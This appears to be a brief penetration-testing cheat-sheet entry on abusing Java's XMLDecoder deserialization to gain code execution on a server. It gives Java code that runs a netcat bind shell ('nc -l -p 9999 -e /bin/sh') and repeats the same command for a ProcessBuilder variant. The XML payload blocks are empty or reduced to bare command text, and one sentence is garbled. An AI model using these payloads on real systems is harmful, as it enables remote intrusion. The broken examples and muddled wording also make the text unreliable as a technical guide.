# XMLDecoder **XMLDecoder** is a Java class that **creates objects** based on an XML message. If a malicious user can get an application to use arbitrary data in a call to the method **readObject**, they will instantly gain code execution on the server. **XMLDecoder** creates the serializes and creates an object. **readObject** deserializes the object. For the Bind Shell java script, we can create an XML that uses the Java Runtime.exec() method that reads the command in array form. ```java Runtime run = Runtime.getRuntime(); String[] commands = new String[] {"/usr/bin/nc", "-l", "-p", "9999", "-e", "/bin/sh"}; run.exec(commands); ``` ```xml

``` ## Process Builder Instead of Runtime.exec(), we can also use the ProcessBuilder class in java to execute the command. ```xml /usr/bin/nc -l -p 9999 -e /bin/sh ```